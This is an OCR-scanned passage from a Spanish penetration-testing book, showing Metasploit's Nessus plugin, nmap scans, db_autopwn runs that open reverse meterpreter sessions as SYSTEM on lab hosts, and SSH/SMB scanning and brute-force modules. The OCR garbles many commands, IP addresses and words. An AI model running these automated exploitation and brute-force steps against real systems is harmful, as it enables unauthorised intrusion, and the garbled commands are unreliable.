la  siguiente  URL  http://wwwnessus.org/products/nessiis/nessus-plugins/obtain-atraciivation-code. 
Tras  obtener  el  email  con  el  codigo  de  activacion  se  deben  seguir  las  instrucciones  que  acompanan  at 
correo  electron ico  para  llevar  a  cabo  el  proceso  de  registro.  Tras  la  activacion  se  recomienda  ahadir 
un  usLiario  mediante  el  uso  del  comando  nessus-adduser  que  se  encuentra  en  ia  mta /opt/nessus/Sbin, 
o  accediendo  mediante  un  navegador  a  la  direccion  https ://localhost: 8834. 


msf  >  load  nessus 

f*!  Nessus  Bridge  for  Metasploit  1.1 
1 1 1  Type  nessus  help  for  a  conwand  listing 

[*1  Creating  Exploit  Search  Index  -  {/root/. msf 3/nessus_index)  -  this  wont  take 
long. 

1*1 

[*]  It  has  taken  :  9.866076362999999  seconds  to  build  the  exploits  search  index 
(*i  Successfully  loaded  plugin:  nessus 
msf  >  nessusconnect  localhost 
Username: 
msf 

■ ^  Password: 

123abc. 

l»J  Connecting  to  https : //localhost: 8834/  as  msf 
I4)  Authenticated 

msf  >  | _ 

Fig  2. 12:  Cargarp/ug/n  nessus  en  Metasploit. 


Estos  son  los  comandos  mas  interesantes  disponibies  con  el  plugin  de  nessus  en  Metasploit. 


Comando 

Description 

nessus  connect 

Realiza  la  conexion  con  el  servidor  de  nessus 

nessus  _policy_list 

Muestra  las  politicas  de  auditoria  que  se  ericuentran  creadas 

nessus jtcanjiew 

Permite  realizar  un  nuevo  escaneo  de  vulnerabilidades.  Ejempjo: 
nessus jtcanjtew  <identificador  de  politica>  <nombre  del  repor(e> 
<direccidn  IP> 

nessus  scanjsiatus 

Muestra  el  estado  del  proceso 

nessus _scan_s  top 

Para  un  escaneo  en  concreto  que  actualmente  esta  siendo  ejecutado 

ness  us_scan_stop_all 

Para  todos  los  escaneos  que  se  encuentran  en  ejecucion 

nessus _reportJist 

Lista  los  reportes  disponibies,  util  para  obtener  ios  identificadores 

nessus  report jget 

Muestra  informacion  sobre  un  reporte  en  concreto.  Ejemp!o:/;m7/.y_ 
report _gei  <identificador> 

nessus _report_exploits 

Muestra  posibies  exploits  que  pueden  ser  lanzados  sobre  la  maquina 
remota 

nessus _report_host  * 

Los  comandos  nessus report hosts,  nessus _report_hostjletail, 
nessus jeport  host jports  proporcionan  informacion  detallada  al 
auditor  sobre  las  maquinas,  puertos,  protocolos,  etcetera 

Fig  2. 11 :  Activacion  de  nessus. 


Tabla  2.04:  Comandos  del  plugin  de  nessus. 
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jms f  >  nessus_pollcy_list 
' i i  Nessus  Policy  list 


'<1  Web  App  Tests 

-3  Prepare  for  PCI-DS5  audits  {section  11.2.2) 

-2  External  Network  Scan 
-1  Internal  Network  Scan 

fflsf  >  nessus  scan  new  -l  msf  prueha  192. 168. 11. IBB 

lrl  Creating  scan  from  policy  niraber  -1,  called  "msf  prueba1'  and  scanning  192.lt 
B.  11. 109 

IM  Scan  started,  uid  is  602ecbbd.217c-2fa6-10a6-b31ddd90an921366f3e9122153d 
BS.f.  > _ _ _ _ 

Pig  2.13:  Consulta  (le  politicos  y  lanzaniicnlo  del  escaner. 

Una  vez  conectado  con  el  servidor  de  nessus ,  se  ha  autenticado  y  se  ha  lanzado  el  escaner  sobre  un 
objetivo,  se  puede  almacenar  ia  informacion  en  una  base  de  datos  como  sc  vio  en  el  punto  c!e  mnap. 

msf  >  db  driver  __________  _ 

!*J  Active  driver:  postgresql 

(*]  Available:  postgresql.  nysql 

>  db  connect  postgres:L23abc.@127.0.0.I/nessus_db 
NOTICE:  CREATE  TABLE  will  create  implicit  sequence  "tiosts_id_seq"  for  serial  co 
l ninn  “ hosts. id “ 

NOTICE:  CREATE  TABLE  /  PRIMARY  KEY  will  create  implicit  index  "hosts  pkey"  for 
table  “hosts" 

NOTICE:  CREATE  TABLE  will  create  implicit  sequence  "clients  irtseq"  for  serial 
column  "clients. id" _ 

Pig  2.14:  Creacion  de  base  de  dalos  para  almacenar  informacion  de  nessm. 

Tras  lanznr  el  escaneo  sobre  el  objetivo  se  puede  recoger  el  reporte  y  median te  el  uso  del  identificador 
que  dispone  este  realizar  distintas  acciones,  como  pueden  ser  listar  posibles  vulnerabiiidades 
encontradas  en  las  maquinas  remotas,  obtener  informacion  sobre  puertos  abiertos,  protocolos 
utilizados  en  dichas  maquinas,  obtener  gran  delalle  sobre  el  sistema  operativo  de  las  maquinas 
remotas  y  versiones  de  los  servicios,  ver  que  exploits  estan  disponibies  para  ser  ianzados,  etcetera. 

isf">  nsssusreporllist  1  1  ’ 

i t i  Nessus  Report  List 


EB2ecbbd-;i7c-2fa6-10a6-b31ddd90alI921566f3e9122IS9d  msf_prueba  completed  65:05  Jun  il  2012 
I*)  You  can: 

l*J  Get  a  list  of  hosts  from  the  report:  nessus  report_host$  creport  id> 

msf  >  nessus  report  get  602ecbbd-217c-2fa6-iea6-b31ddd90aU921566f3e9122159d 
! •)  importing  6a2ecbbd-217c-2fa6-10a6-b31ddd90all921566f3e9122159d 

l*i  192.168.11.108  Microsoft  Windows  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  a 


msf  >  nessus  report  exploits  602ecbbd-217c-2fa6-10a6-b31ddd90all92156Gf3e9122159d 
I '  J  Examining  602ecbbd-217c-2fa6-10a6-b31ddd90an9215D6f3e9122159d 
H  Experimental,  trust  but  verify 

192.168.11.108  |  Microsoft  Windows  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  |  <14 
5  |  NSS-26920  |  Sev  2  |  I "windows /http/edirectoryhost"] 

192.168.11.108  |  Microsoft  Windows  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  |  44 
3  |  NSS- 10394  )  Sev  1  |  ["windows/smb/psexec") 

192.16B.ll.108  |  Microsoft  Windows  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  |  6 
|  NSS-10114  |  Sev  1  |  ("windows/oracle/tns  arguments") 

IQsf  > 


Fig  2.15:  Gestion  de  reporles. 


Existen  mas  comandos  del  plugin  de  nessus,  los  cuales  proporcionan  configitracion  Msica  y„ 
avanzada  del  servidor  de  la  herramienta,  y  todo  ello  desde  el  entorno  de  Meiasploit.  Estos  comandos^ 
pueden  ser  utiles  para  gestionar  y  configurar  el  escaner  correctamente,  pero  este  proceso  escapa  de| 
los  objetivos  del  presente  libro. 

Escaner  MBSA  e  importacion  de  datos 

Microsoft  Baseline  Security  Analyzer,  o  MBSA,  es  una  herramienta  que  permite  a  los  profesionales 
T1  y  auditores  determinar  el  estado  de  seguridad  segun  las  recomendaciones  de  Microsoft.  Con 
esta  herramienta  se  pueden  detectar  los  errores  mas  comunes  de  configuracion  en  la  seguridad  de 
los  sistemas  operatives  de  Microsoft  y  la  falta  de  actualizaciones  en  el  sistema  operativo  que  se 
encuen trail  por  instalar,  sienipre  hablando  de  productos  de  la  companla  de  Redmond.  I 

3ste  escaner  dispone  de  una  interfaz  grafica  y  de  un  cliente  de  linea  de  comandos.  El  cliente  de  linea  ' 
i.le  comandos  es  mas  versatil  y  proporciona  un  mayor  numero  de  funcionalidades  al  auditor.  Una  de  t 
as  mas  interesantes  es  la  posibilidad  de  exportar  a  un  fichero  XML  la  informacion  recogida  por  el 
escaner.  ’ 

■  i 

Este  documento  puede  ser  importado  a  la'  base  de  datos  de  Meiasploit  directamente  a  traves  del 
comando  dbjmport,  previa  conexion  del  framework  a  la  base  de  datos.  Una  vez  el  fichero  es 
importado  a  la  base  de  datos  se  puede  acceder  a  dicha  informacion  a  traves  de  los  comandos  de  tipo  1 
db_*  que  se  han  estudiado  en  este  capitulo. 

I 

La  conclusion  final  que  debe  quedar  al  auditor  es  la  facilidad  para  importar  los  resultados  de  otros 
escaneres  a  Meiasploit  y  el  tratamiento  de  dicha  informacion,  gracias  a  ja  flexibilidad  Mframewort^ 
para  avanzar  en  el  test  de  intrusion. 

Tecnica  Autopwn 

La  funcionalidad  autopwn  permite  al  auditor  automatizar  el  proceso  del  test  de  intrusion.  El  auditor 
realizara  un  analisis  o  escaneo  sobre  una  red  y  en  ftincion  de  los  resultados,  autopwn,  lanzara  una 
serie  de  exploits  que  pueden  provocar  la  obtencion  de  acceso  remote  al  sistema  vulnerable.  I 

Autopwn  se  apoya  en  una  base  de  datos,  la  dial  en  este  capitulo  se  ha  visto  como  crear  y  como 
conectar  con  ella,  para  recoger  ia  informacion  que  utilizara  para  lanzar  una  cantidad  de  exploits  con 
el  objetivo  de  aprovechar  alguna  vulnerabilidad  conocida  sobre  ios  servicios  que  pueden  disponer 
las  maquinas  remotas.  Si  autopwn  explota  alguna  vulnerabilidad  puede  devolver  el  control  de  la 
maquina  remota,  por  ejemplo,  proporcionando  una  sesion  de  meterpreter  o  una  shell  remota. 

El  potential  que  proporciona  esta  funcionalidad  es  enorme  ya  que  se  pueden  utilizar  la  informacion 
recogida  con  distintos  escaneres,  por  ejemplo  nessus  o  mnap,  utilizanclo  la  importacion  mediante  t 
archives  o  incluso  la  integracidn  de  la  herramienta  con  el  framework  automaticamente.  Una  vez 
elegida  la  manera  de  trabajar,  autopwn  realizara  el  resto. 


Metasploit  para  Pentesters 


Cawlulo  Preliminares 


El  comando  para  interactuar  coo  la  funcionalidad  es  dbjnitopwn.  Hay  que  tener  en  cuenta  que  en 
aigunas  versiones  de  Metasploit,  se  esta  deshabiiitando  esta  funcionalidad,  por  lo  que  se  recomienda 
al  auditor  que  tenga  cuidado  al  actualizar  el  framework,  si  no  quiere  perder  dicha  funcionalidad.  Bste 
comando  dispone  de  los  siguientes  parametros  que  aportan  distintos  comportamientos:. 


Parametro 

Description  y  cjemplo 

-l 

Muestra  todos  los  modulos  de  tipo  exploit  que  se  eslan  lanzando 

-X 

Autopwn  selecciona  los  modulos  de  tipo  exploit  en  funcion  de  las  posibles 
vulnerabiiidades  enconlradas 

-p 

Autopwn  selecciona  los  modulos  de  tipo  exploit  en  funcion  de  los  puertos  y 
servicios  abiertos 

-e 

Lanza  exploits  contra  los  objetivos  marcados 

-r 

Utiliza  una  shell  inversa  cuando  se  consigue  acceso 

-b 

Util tza  una  shell  directa  con  un  puerto  aleatorio  por  defecto 

-q 

Deshabiiita  la  salida  de  los  modulos  de  tipo  exploit 

-R  <rank> 

Solo  lanza  los  modulos  que  dispongan  de  un  rank  minimo.  Se  debe  especiftcar  el 
rank ,  por  ejemplo  excellent 

-1  <range> 

Solo  se  lanzaran  los  exploits  sobre  los  equipos  que  se  encuentren  en  el  rango.  Se 
debe  especificar  el  rango  despues  del  parametro 

-X  <range> 

Exeluye  los  equipos  que  se  encuentren  en  el  rango  de  ser  probados  mediante  el 
lanzamiento  de  exploits 

-PI  <range> 

Solo  lanza  los  exploits  sobre  las  maquinas  que  dispongan  de  los  puertos  abiertos 
que  se  especifica  en  el  rango 

-PX  <range> 

Se  excluyen  los  equipos  con  los  puertos  abiertos  que  se  indican  en  el  rango,  pol¬ 
io  que  no  seran  probados  mediante  exploits 

Tabla  2.05:  Parametros  de  dbjnitopwn. 


PoC:  nmap  +  Autopwn 

En  la  siguiente  prueba  de  concepto  se  va  a  realizar  una  conexion  a  una  base  de  datos  local  con 
Metasploit,  despues  se  utiiizara  la  inlegracion  de  nmap  con  el  framework  para  realizar  un 
descubrimiento  de  maquinas  sobre  una  red,  obteniendo  entre  otros  valores  los  puertos  abieitos 
de  dichas  maquinas.  Por  ultimo,  se  lanzara  la  funcionalidad  autopwn  con  el  objetivo  de  probar  la 
fortaieza  y  segtiridad  de  los  equipos  de  esa  red,  la  cual  es  objeto  de  estudio. 

En  primer  lugar,  tras  lanzar  msfconsole,  se  conecta  el  framework  a  la  base  de  datos  y  se  lanza  un 
nmap  sobre  la  red  de  estudio.  La  information  de  nmap  queda  alinacenada  en  la  base  de  datos,  la  cual 
puede  ser  recuperada  en  cualquier  instanle,  por  si  fuera  necesario.  Las  opciones  con  las  que  nmap 
sea  lanzado  queda  en  manos  He  la  imagination,  necesidad  y  creatividad  del  auditor. 


iBsf  >  db_connect  postgres:123abc.@127.0.0. 1/test  J.ibro 
msf  >  db  nmap  -sS  18.0.0.9/24 

[*}  Nmap:  Starting  Nmap  5.51SVN  (  http://nmap.org  )  at  2012-06-13  95:35  CE5T 
[*]  Nmap:  Nmap  scan  report  for  10.9.0.1 
[*3  Nmap:  Host  is  up  (0.800034s  latency). 

[*]  Nmap:  Not  shown:  999  closed  ports 
[*]  Nmap:  PORT  STATE  SERVICE 
1*1  Nmap:  lll/tcp  open  rpcbind 
[*]  Nmap:  Nmap  scan  report  for  10 .'0.0.100 
(*]  Nmap:  Host  is  up  (0.0012s  latency). 

[*]  Nmap:  Not  shown:  997  closed  ports 
(*]  Nmap:  PORT  STATE  SERVICE 
[*]  Nmap:  135/tcp  open  msrpc 
{*]  Nmap:  133/tcp  open  netbios-ssn 

[*]  Nmap;  445/tcp  open  microsoft-ds 

[*]  Nmap:  MAC  Address:  08:00;27:A4:A9:30  (Cadmus  Computer  Systems.! 

[*]  Nmap:  Nmap  scan  report  for  10.8.6.110 
[*]  Nmap:  Host  is  up  (0.0011s  latency). 

[*]  Nmap;  Not  shown:  997  closed  ports 
[*]  Nmap:  PORT  STATE  SERVICE 
l*]  Nmap:  135/tcp  open  msrpc 

Nmap:  139/tcp  open  netbios-ssn 

[*]  Nmap:  445/tcp  open  microsoft-ds 

(*}  Nmap:  MAC  Address:  08:00;27:E9:43:A5  (Cadmus  Computer  Systems) 

f*1  Nmao:  Nmao  done:  256  IP  addresses  (3  hosts  up)  scanned  in.  3 1,34. seconds..., 

Fig  2.16:  Conexion  a  la  base  de  datos  y  escaneo  con  nmap. 

Ahora  se  dispone  de  lo  necesario  para  lanzar  autopwn  sobre  los  equipos  que  se  requiem.  Hay  que 
tener  en  cuenta  que  se  necesita  o  lo  que  se  requiere,  por  lo  que  no  esta  de  mas  disponei  ceica  los 
parametros  de  autopwn  y  decidir  sobre  que  equipos  se  lanza,  quiza  no  sea  necesario  ianzarlo  sobre 
todos  los  equipos  que  forman  parte  de  la  red,  o  quiza  se  requiem  solo  sobre  algunos  de  elios  que 
disponen  de  ciertos  servicios  y  no  sobre  todos.  Por  lo  que  de  nuevo  el  auditor  debe  eiegir  la  mejor 
accion  en  funcion  de  las  necesidades  del  test  de  intrusion. 


msf  >  db_hosts 
Hosts 


address 


mac 


name  os  name  osflavor  ossp  purpose  info  comments 


10.0.0.1 

18.0.9.100  08:00:27:A4:A9:3D 
10.8,0.110  08 : 00 : 27 : E9 : 43 : A5 


msf  >  db  autopwn  -p  -t  -e  -r  -I  19. 0.8.100-19. 9. 0.109 

Fig  2. 1 7:  Lanzamiento  de  autopwn  sobre  un  rango  de  equipos.  ,  :,i 

•A  1  rle  eXpfyifWi 

Tras  el  lanzamiento  de  autopwn  toca  esperar  hasta  que  la  recoieccion  y  ejecucioi  .  j)niefe|i 
termine.  Cuanto  mayor  sea  el  numero  de  maquinas  mayor  tiempo  lievara  e  Pr0J;efa_^//r/^/|2|i 
En  algunos  rincones  de  Internet  se  denomina,  coloquialmente,  a  autopwn  como  i. 

Metasploit  por  el  efecto  artasador  que  provoca  en  un  test  de  jnliuston.  ay  que  i  . 
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mas  puristas  indican  que  el  test  de  intrusion  debe  estar  siempre  controlado  y  saber  que  exploits  se 
ejeciitan  en  cada  momento,  a  la  vez  que  no  probar  algo  si  no  se  tiene  la  certeza  de  que  puede  existir 
una  vulnerabilidad.  Autopwn  rompe  eon  estas  sentences  o  consejos,  por  lo  que  es  el  lector  el  que 
debe  elegir  si  utilizar  esta  fimcionalidad  en  el  mundo  profesional. 

[*]  (51/51  [0  sessions]):  Waiting  on  24  launched  modules  to  finish  execution... 

(*,)  Meterpreter  session  1  opened  (10.0.0.1:32123  ->  10.0.0,100:1064)  at  2012-06-13  05:57:18  +020 

M  (51/51  [1  sessions]):  Waiting  on  12  launched  modules  to  finish  execution,.. 

.'I  (51/51  [I  sessions]):  Waiting  on  9  launched  modules  to  finish  execution... 

Pig  2.18:  Ohtencidn  de  sesidn  inversa  eon  un  sislema  objetivo. 


PoC:  nessus  +  Autopwn 

bn  la  siguiente  prueba  de  concepto  se  va  a  realizar  la  conexion  con  la  base  de  datos  y  sc  utilizara 
la  herramienta  nessus  para  escanear  una  red  en  busca  de  vulnerabiiidades.  nessus  se  utilizara  desde 
msfcomole  gracias  a  la  integracidn  de  este  con  el  entorno  como  se  ha  podido  estudiar  en  este  capitulo. 

En  ptimer  lugar,  se  debe  conectar  con  la  base  de  datos  con  el  comando  dbjsonnect  como  se  ha 
lealizado  en  la  prueba  de  concepto  anterior.  Hay  que  toner  en  cuenta  que  para  utilizar  nessus 
mtegrado  con  Metasploit  se  debe  cargar  el  plugin  mediante  la  instruction  load  nessus  en  la  sesion 
de  msfcomole .  Una  vez  disponibles  los  comandos  de  nessus  en  la  sesion  en  curso  de  msfconsole  se 
debe  conectar  con  el  servidor  del  eseaner  mediante  e!  uso  de  nessus ^connect  <direccidn  servidor>. 

Se  debe  tener  claro  que  politica  se  utilizara  para  realizar  el  escaneo,  en  este  ejemplo  se  utilizara 
una  creacla  pteviamente  en  nessus  cuyo  nombre  es  msfjibro.  Para  lanzar  el  escaneo  utilizando 
esta  politica  se  utilizara  el  comando  nessus jcanjiew  <id polUica>  <nombre  escaneo>  <red  o 
eauino>. 


iisT 

>  nessus  policy  List 

- - - - 

l+i 

Nessus  Policy  List 

10 

Name 

Comments 

-4 

Web  App  Tests 

-3 

Prepare  for  PCI-DSS  audits  (section  11.2.2) 

-2 

External  Network  Scan 

-1 

Internal  Network  Scan 

1 

msf_lihro 

msf 

>  nessus_scan_new  1  msf  red  10.0.0.0/24 

[+] 

24^ 

Creating  scan  from  policy  number  l,  called 

"ms^red'’  and  scanning  10.0.0.0/ 1 

1*1 

Scan  started,  uid  is  afal61d6-bb4d-cb8f-9c35-58c6b50c663889ac4e087d09ee37 

Fig  2. 1 9:  Lislado  tie  politicns  y  ejecuci6n  de  uu  escaneo  en  funci6n  de  la  polflica. 

El  escaneo  puede  llevar  bastante  tiempo,  en  funcion  de  lo  que  se  eompruebe.  Metasploit  no  bloquea 
la  sesion  de  msfcomole,  lanza  ei  proceso  en  segundo  piano  y  en  cualquier  momento  se  puede 
comprobar  en  que  estado  se  encuentra  el  escaneo  con  ei  comando  nessus jcanjtatus. 


CapUulo  II.  Preliminares 


rcsf  >  Ressus_scan_5tatu5 
r  * ;  Running  Scans 

Scan  10 

Current  Hosts  Total  Hosts 


Name  Owner  Started 


af a 16 ld6- bb4d-  cbBf  -9c35  -  58c6b50c6B38B9ac4e087dS9ee37  msf  red  msf  96:39  Tun  13  2912  running 
38  254 


rmport  Nessus  report  to  database  : 
Pause  a  nessus  scan  : 


nessus_report_get  <repurtid> 
nessus_scan_pause  <scanid> 


Fig  2.20:  Informacion  sobre  el  estado  del  proceso  lanzado  desde  netsttus. 

Aliora  para  importar  los  resultados  del  reporte  a  la  base  de  datos  se  puede  utilizar  el  comando 
nessus  report  ^et  <idreport> .  La  importacion  de  datos  puede  llevar  su  tiempo  debido  a  la  cantidad 
de  informacion  de  la  que  se  disponga  en  el  reporte  original. 

msf  >  nessus  report  list  '  : '  '  -  ■■  ■ 

f-t  Nessus  Report  List 


Status  Date 


79e7B14a-6lee-b5cl-9a6a-9359b6417alb783e8c5B3654a6bc  msf  running  67:95  Jun  13  2012 

afal61(l6-bb4(!-cb8f-9c35-5BcGb50c663B89ac4e887[l09ee37  msf_red  completed  06:43  Jun  13  2012 

lable39f-lbld-baf5-cecl-73cac4e78Db324b2B33debf84d23  msf”  running  87:04  Jun  13  2012 

602ecbbd-217c-2fa6-10a6-b31ddd98all321566f3e9122153d  rasfjjrueba  completed  05:95  Jun  11  2012 

(*!  You  can: 

[♦]  Get  a  list  of  hosts  from  the  report:  nessus  report  hosts  < report  id> 

msf  >  nessus_report_get  afal61d6-bb4d-cb8f-9c35-5Bc6b50c663889ac4e087d09ee37 
| *)  importing  afal6ld6-bb4d-cb8f-9c35-S8c6b5ec663B89ac4e087d09ee37 

i*j  I8.B.0.118  Microsoft  Windows  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  Done! 
i*J  18. 8.9. 108  Microsoft  Windows'  XP  Service  Pack  2  or  Microsoft  Windows  XP  Service  Pack  3  {nwu:‘  . 

[»]  18.8.8.1  Linux  Kernel  2. 6.3B  on  Ubuntu  1B.B4  /  _ . 

Fig  2.21 :  Importacion  de  resultados  tie  un  reporte  de  ndssvs. 

Este  es  un  biien  momento  para  refrescar  los  comandos  dbjiosts,  dbjervices,  db_vulns  y  ojear  la  ( 
informacion  que  se  dispone  en  1a.  base  de  datos.  Una  vez  que  el  auditor  este  preparado  para  lanzar 
autopwn  y  crea  que  este  puede  tener  exito  sobre  los  equipos  remotos,  se  lanzara  la  fimcionalidad 
contra  los  equipos. 


1*1  (159/169  (3  sessions]):  Waiting  on  15  launched  modules  to  finish  execution,, 

1*1  (169/169  j 3  sessions]):  Waiting  on  14  launched  modules  to  finish  execution., 

l*J  (169/169  (3  sessions]):  Waiting  on  14  launched  modules  to  finish  execution., 

t«]  (169/169  (3  sessions]):  Waiting  on  13  launched  modules  to  finish  execution., 

1*1  The  autopwn  command  has  completed  with  3  sessions 
[*)  Enter  sessions  -i  [ID]  to  interact  with  a  given  session  10 


2  Interpreter  X86/win32  NT  AUTHORITY\SYSTEM  @  PRU£BAS-01760CC  10. 0.8. 1:24947  ->  18.8.0. 180 
:  1065 

3  meterpreter  x86/win32  NT  AUTI|0RITY\5YSTEM  @  PRUE8AS-81769CC  18.0.0.1:4652  ->  18.8,8.180: 
1966 

4  meterpreter  x86/win32  NT  AUTHORITASYSTEM  «  PRUEBAS-01760CC  10.0.8.1:35313  •>  10.0.8.110 
:  1855 


Fig  2.22:  Obtencion  de  sesiones  con  autopwn. 


4.  Escaiieres  dirigidos  a  servicios 

A  veces  puede  ser  realmente  interesante  para  el  auditor  centrarse  en  uno  o  varies  servicios  concretos 
y  obtener  la  maxima  information  de  ellos  que  se  pueda.  En  este  apartado  se  van  a  estudiar 
herramientas  que  se  disponen  en  el  framework  que  tienen  por  objetivo  el  especificado  anteriormente. 

El  objetivo 

Es  realmente  importante  conocer  las  versiones  de  los  productos  y  el  estado  de  estos.  Hoy  en  dla 
una  conllguracidn  por  defeclo  o  una  mala  configuration  tarnbien  pueden  ser  signos  de  posibles 
problemas  de  seguridad  graves.  Es  cierto  que  cuanta  mas  informacion  se  disponga  del  objetivo,  las 
posibilidades  de  exito  en  el  test  de  intrusion  aumentan. 

Una  vez  que  se  dispone  de  este  tipo  de  informacion,  que  puede  ser  mas  util  de  !o  que  a  priori  a 
cualquier  usuario,  incluido  los  adminislradores,  les  pueda  parecer  es  posible  realizar  la  busqueda  de 
exploits  para  las  versiones  de  los  productos  locaiizados  en  el  analisis  del  entorno. 

Google,  conocido  por  todo  usuario  de  Internet,  es  uno  de  los  mayores  buscadores  de  exploits  al  que  se 
puede  acceder.  Simplemente  realizando  btisquedas  con  palabras  magicas  como  exploit  <produclo> 
<versidn>  se  pueden  obtener  resultados  sorprendentes,  consiguiendo  por  supuesto  el  exploit  que  se 
requiere.  Pero  esto  es  una  practice  que  un  usuario  de  internet  realizaria  ante  una  busqueda  requerida 
de  cualquier  cosa. 

Otras  fuentes  interesantes  sobre  exploits  con  grandes  bases  de  datos  son: 

-  http://www.exploit-db.com.  La  cual  proporciona  gran  cantidad  de  informacion  sobre 
exploits  organizados  por  categonas  como  locales,  remotos,  web,  etcetera.  Como  curiosidad 
indicar  que  en  algunos  exploits  se  proporciona  tarnbien  el  ejecutable  de  la  version  del 
producto  vulnerable.  Tarnbien  disponen  de  una  direction  para  descargar  exploits  escritos  por 
Metasploit  d  i rectamen te,  h  ttp'Jhvww.  exploit-db.  com/author/? a =32 11 . 

-  http://packetstormsecarity.org.  Otra  de  las  grandes  referencias  en  sitios  web  de  seguridad. 
Actualization  diaria  de  exploits  con  toda  la  informacion  detallada  sobre  las  vulnerabilidades. 

-  http://www.securityfocus.com.  Siempre  actualizada  y  con  la  informacion  detallada,  un 
sitio  web  que  no  puede  faltar  en  los  favoritos  de  nadie.  Recomendable  el  uso  de  sus  listas 
para  estar  siempre  informado. 

Herramientas  auxiliary  en  Metasploit 

Metasploit  dispone  de  distintos  modulos  de  tipo  auxiliaiy  con  los  que  se  puede  obtener  diversa 
informacion  sobre  servicios  y  maquinas  remotas.  En  este  apartado  se  muestran  algunos  ejemplos 
de  como  obtener  informacion  valiosa  realizando  una  serie  de  pruebas  sobre  los  servicios  remotos. 

Para  empezar  se  exponen  2  modulos  que  ayudaran  al  auditor  a  obtener  la  version  de  un  servidor 
FTP  remoto.  La  primera  herramienta  o  modulo  que  se  utilize  es  auxiliary/ 'scanner/ftp/ftp _vers ion. 


Su  configuracion  es  realmente  sencilla,  se  indica  el  FTP  remoto  en  la  variable  RHOSTS,  el  puerto 
por  el  que  escucha  el  FTP. 

msf  auxlUary(ftp  version)  >  use  auxitlary/scanner/ftp/ftp.  version 
msf  auxiliaryif tpj?ersion)  >  set  RHOSTS  flpiiH0i.es 

msf  auxiliary (ftp_version)  >  run 

1*1  H®. MS-Si.49': 21  FTP  Banner:  ‘220  ProFTRD  1.2.8  Server  (ProFTPO  Default  Installation)  leaMSi 
aHHpfl  es]\x8d\xea ' 

|*I  scanned  1  of  1  hosts  (108%  complete) 
hi  Auxiliary  module  execution  completed 
msf  3uxil.iary(ftp  version)  >  | 

Fig  2.23:  Deteceidn  de  version  de  un  servidor  FTP. 

Otra  herramienta  que  se  puede  ulilizar  es  auxiliary/scanner/flp/ationymous  con  la  que  mediant©  el 
uso  del  usuario  anonimo  se  puede  detectar  la  version  del  servidor  FTP. 

Bxisten  distintos  modulos  auxiliary  para  el  servicio  SSH.  El  primero  que  se  expiica  permile 
obtener  de  manera  rapida  la  versibn  del  servicio  remoto.  La  ruta  de  esta  herramienta  es  auxiliary/ 
scanner /ssh/sshj>ersion  y  es  bastante  sencillo  de  configurar,  se  indica  la  maquina  remote  y  se  tanza 
el  modulo. 

msf  auxiliarvtssh'  login)  >  use  auxiliary/scanner/ssh/ssh_version 
msf  auxiliary{ssh_varsion)  >  run 

[+]  $Bk.ifig.4.M:22,  SSH  server  version:  SSH-2.0-OpenSSH_5.lpl  Debian-5 
(*]  Scanned  1  of  1  hosts  (100%  complete) 

[*]  Auxiliary  module  execution  completed 

msf  auxiliary(ssh_version)  >  _ _ 

Fig  2.24:  Deleccidn  de  version  de  un  servidor  SSH, 

Existen  otras  herramientas  muy  interesantes  para  realizar  fuerza  bruta  sobre  el  servicio  SSH.  La 
primera  se  encuentra  en  la  ruta  auxiUary/scanner/ssh/sshJogin  y  permite  realizar  fuerza  bruta  a 
cuentas  de  usuario  que  se  puedan  entrar  en  el  sistema  mediante  autenticacion  de  login  y  password. 
A  este  modulo  se  le  puede  configurar  un  diccionario  de  claves  y  una  lista  de  usuarios  e  ir  probando 
las  posibles  combinaciones.  Ademas,  comprobara  la  posibilidad  de  autenticarse  en  el  sistema  con 
clave  en  bianco,  una  mala  configuracion  en  un  servidor.  La  segunda  heiramienta  se  encuentia  en  la 
ruta  auxiliary/scanner/ssh/ssh  y  permite  realizar  fuerza  bruta  a  usuarios  que  se  autentiquen  mediante 
el  uso  de  certificados.  En  otras  palabras,  se  dispone  de  una  clave  privada,  obtenida  de  algiin  modo, 
posiblemente  fraudulento,  y  se  va  probando  con  los  distintos  usuarios  que  se  especifiquen. 

El  servicio  SMB,  Server  Message  Block,  tarnbien  dispone  de  herramientas  con  las  que  se  puede 
obtener  informacion  util  para  poder  utilizarlas  durante  el  ataque.  En  la  ruta  auxiliary/scanner/wib/ 
smbjversion  se  dispone  de  un  escaner  con  el  que  se  puede  detectar  la  version  del  sistema  operativo 
donde  se  encuentra.  el  servicio  SMB.  Si  Metasploit  estuviera  conectado  a  la  base  de  datos,  los 
resultados  obtenidos  de  estos  escaneres  actualizarian  los  valores  de  dicha  base  de  datos.  La  pnieba 
se  puede  realizar.de  la  siguiente  manera:  tras  lanzar  el  escaner  se  puede  realizar  una  consul ta,  por 
ejemplo  con  la  instruccion  dbjiosts  -c  name, os _sp, address.  Se  puede  anexar  mas  G0  umnas  en 
funcion  de  la  informacion  que  se  quiera  recuperar  de  la  base  de  datos. 
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Mf  auxiUaryjssh  login  pabkcy)  >“use  auxiliary/scanner/smb/smb  version - 

jnsf  auxiliary/ smb  wersion)  >  show  options 

Module  options  (auxiliary/scanner/srab/sfnb  version): 

Name  Current  Setting  Required  Description 

cIJon1S  ■  „  yes  The  target  address  range  or  CIOR  identifier 

SJJJJ1"  WORKGn01JP  no  The  Windows  domain  to  use  for  authentication 

„  110  The  Password  for  the  specified  username 

.  no  The  username  to  authenticate  as 

MRfcAos  x  yes  The  number  of  concurrent  threads 

i&f  auxiliary (smbjjersion)  >  set  RHOSTS  16.0  8  100 

RHOSTS  =>  10.0.0.100 

mil  auxiliary (smb^ersion)  >  run 

a'lZi*;*™  ™™rln9 xp  servlce  p“k  3  ,l“8M9e:  SpB"lsl'1  <"■««-<>»« 

L*j  Scanned  1  of  1  hosts  (100%  complete) 

ill  Auxiliary  module  execution  comnlrtpd _ _ 

Fig  2.25:  Detection  de  version  de  sislema  operativo  y  SMB. 

Este  Upo  de  escaneres  orientados  a  un  servicio  concreto  son  mas  siienciosos  que  los  escaneres  que 
analizan  un  gran  nimiero  de  servicios  o  recursos,  por  lo  que  si  se  necesita  evitar  un  analisis  masivo 
y  ruidoso,  eslas  herramientas  son  eseiiciaJes. 

En  la  ruta  auxiliary/scanner/smh/smbjogin  se  encuentra  la  apiicacion  que  permite  realizar  una 
